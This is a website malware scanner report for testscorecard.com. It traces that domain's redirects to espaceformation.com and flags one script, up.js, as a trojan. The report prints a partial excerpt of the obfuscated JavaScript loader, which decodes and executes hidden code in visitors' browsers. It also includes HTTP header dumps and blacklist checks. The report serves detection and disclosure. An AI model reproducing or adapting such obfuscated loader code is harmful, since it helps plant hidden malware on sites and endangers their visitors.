New scan:

Malware Scanner report for testscorecard.com

Malicious/Suspicious/Total urls checked
1/0/9
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://testscorecard.com/
HTTP/1.1 302 Found
Connection: close
Date: Tue, 03 Jun 2014 23:09:27 GMT
Location: http://espaceformation.com/scripts/reg/authorize.php
Server: Apache
Content-Length: 236
Content-Type: text/html; charset=iso-8859-1
clean
http://espaceformation.com/scripts/reg/authorize.php
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 03 Jun 2014 23:09:28 GMT
Via: 1.1 varnish
Accept-Ranges: bytes
Age: 0
Location: http://www.espaceformation.com/scripts/reg/authorize.php
Server: Apache
Vary: Accept-Encoding
Content-Length: 264
Content-Type: text/html; charset=iso-8859-1
X-Varnish: 591358994
clean
http://www.espaceformation.com/scripts/reg/authorize.php
200 OK
Content-Length: 1283
Content-Type: text/html
clean
http://www.espaceformation.com/scripts/reg/modernizr.custom.63321.js
200 OK
Content-Length: 9661
Content-Type: application/javascript
clean
http://espaceformation.com/scripts/up.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 03 Jun 2014 23:09:28 GMT
Via: 1.1 varnish
Accept-Ranges: bytes
Age: 0
Location: http://www.espaceformation.com/scripts/up.js
Server: Apache
Vary: Accept-Encoding
Content-Length: 252
Content-Type: text/html; charset=iso-8859-1
X-Varnish: 591359000
clean
http://www.espaceformation.com/scripts/up.js
200 OK
Content-Length: 2128
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(NCZ){var Z8j="\xe4\xf0\xda\xa44\xe2\xbe4m\xff\x8f\xd2\xbe~\x9c\x9ere2\x0a\x0c\x0b\x0e&\x08\x08\x0f\x0a\x0c\x09\x0a\x0b\x0a\x0e\x0c\x0f\x08%\x0e\x08\x0b\x09\x0f\"\x08\x0c\x0a\x08\x09\x0d\x0b\x20#\x08\x08\x0f\x0f\x0e%!\x0a&\x0f!\x0f\x0e!\x0e\x09\x0f\x0a\x09%\"*/4]hSjWE2bPMA0phd(*-epo`r"+"knh/ivw+{`gT85{41).2y`f,4xg0**0>OLU<+`woeshkn*z*~tdw#d<XAF)$G]|7dDiweaoAa`Mx\x20(*@E,\"VdFYz2cm'(/AF)$Li"+"Lllv!,.BA+'Qz^eb$.-CD*\"AxSkmegoMcb#/+F@(\x20DkPLobOfH~q`rZ[cNlnhE'+)BG-#mjWb$.
... 1208 bytes are skipped ...
\x73\x74\x72\x69\x6e\x67"](0,Sbp[ox[2]]);GD=function(Gjg){var PP,K5Z,Y0=K5Z="",Jc=0;Gjg=Gjg[ox[0]](Y0);for(PP in Gjg){if(Gjg[ox[3]](PP)){K5Z+=EXN(Gjg[PP],gi[ox[0]](Y0)[Jc%=gi[ox[2]]]);Jc++;}}return(K5Z);};gi=GD(Sbp);NCZ[GD("fs`o")](GD(Z8j[GD("ppcprphh`")](Sbp[GD("o`odrj")])))})(window,EXN=function(yF,dZ,YIw,TUI){yF=yF[YIw="\x63"+(TUI="\x68\x61\x72\x43\x6f\x64\x65")+"\x41\x74"](0);return(String["\x66\x72\x6f\x6d\x43"+TUI](yF&cbV|((yF&(~cbV&0xff))^(dZ[YIw](0)&(~cbV&0xff)))))});

Antivirus reports:

NANO-Antivirus
Trojan.Script.Heuristic-js.iacgm

http://testscorecard.com/test404page.js
HTTP/1.1 302 Found
Connection: close
Date: Tue, 03 Jun 2014 23:09:29 GMT
Location: http://espaceformation.com/scripts/reg/authorize.php
Server: Apache
Content-Length: 236
Content-Type: text/html; charset=iso-8859-1
clean
http://espaceformation.com/test404page.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 03 Jun 2014 23:09:29 GMT
Via: 1.1 varnish
Accept-Ranges: bytes
Age: 0
Location: http://www.espaceformation.com/test404page.js
Server: Apache
Vary: Accept-Encoding
Content-Length: 253
Content-Type: text/html; charset=iso-8859-1
X-Varnish: 591359004
clean
http://www.espaceformation.com/test404page.js
404 Not Found
Content-Length: 212
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: testscorecard.com

Result:
HTTP/1.1 302 Found
Connection: close
Date: Tue, 03 Jun 2014 23:09:27 GMT
Location: http://espaceformation.com/scripts/reg/authorize.php
Server: Apache
Content-Length: 236
Content-Type: text/html; charset=iso-8859-1

...236 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: testscorecard.com
Referer: http://www.google.com/search?q=testscorecard.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=testscorecard.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://testscorecard.com/

Result: testscorecard.com is not infected or malware details are not published yet.